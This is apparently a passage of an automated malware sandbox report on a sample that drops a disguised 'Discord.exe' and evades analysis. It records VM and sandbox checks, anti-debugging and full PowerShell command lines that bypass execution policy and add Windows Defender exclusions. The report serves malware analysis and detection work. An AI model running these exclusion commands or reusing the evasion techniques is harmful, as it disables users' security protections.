                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: s3OBQLA3xR.exe, Discord.exe.0.drBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeMemory allocated: 1ABA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord.exeMemory allocated: 730000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exeMemory allocated: 1A5F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exeMemory allocated: B00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exeMemory allocated: 1A600000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exeMemory allocated: 11A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exeMemory allocated: 1AD30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exeMemory allocated: C40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exeMemory allocated: 1A6B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exeMemory allocated: A30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exeMemory allocated: 1A900000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Discord.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Discord.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Discord.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Discord.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeWindow / User API: threadDelayed 8028Jump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeWindow / User API: threadDelayed 1794Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6392Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3387Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8143Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1430Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8240Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1096Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7627
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2010
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe TID: 7524Thread sleep time: -40582836962160988s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 8143 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep count: 1430 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700Thread sleep count: 7627 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272Thread sleep count: 2010 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2020Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Discord.exe TID: 7588Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Discord.exe TID: 796Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Discord.exe TID: 7972Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Discord.exe TID: 7832Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Discord.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Discord.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Discord.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Discord.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Discord.exeThread delayed: delay time: 922337203685477
                    Source: Discord.exe.0.drBinary or memory string: vmware
                    Source: s3OBQLA3xR.exe, Discord.exe.0.drBinary or memory string: wQCovZLVGej8P2DgoDmpnj6MmF3M4jMR2qEH8rldPDYmc37BxcsAttOchGfsvSxbaH5Z
                    Source: s3OBQLA3xR.exe, 00000000.00000002.3000236773.000000001BB2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
                    Source: s3OBQLA3xR.exe, 00000000.00000002.3000236773.000000001BAEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeCode function: 0_2_00007FFD9B7E764A CheckRemoteDebuggerPresent,0_2_00007FFD9B7E764A
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Discord.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe'
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe'Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 's3OBQLA3xR.exe'Jump to behavior
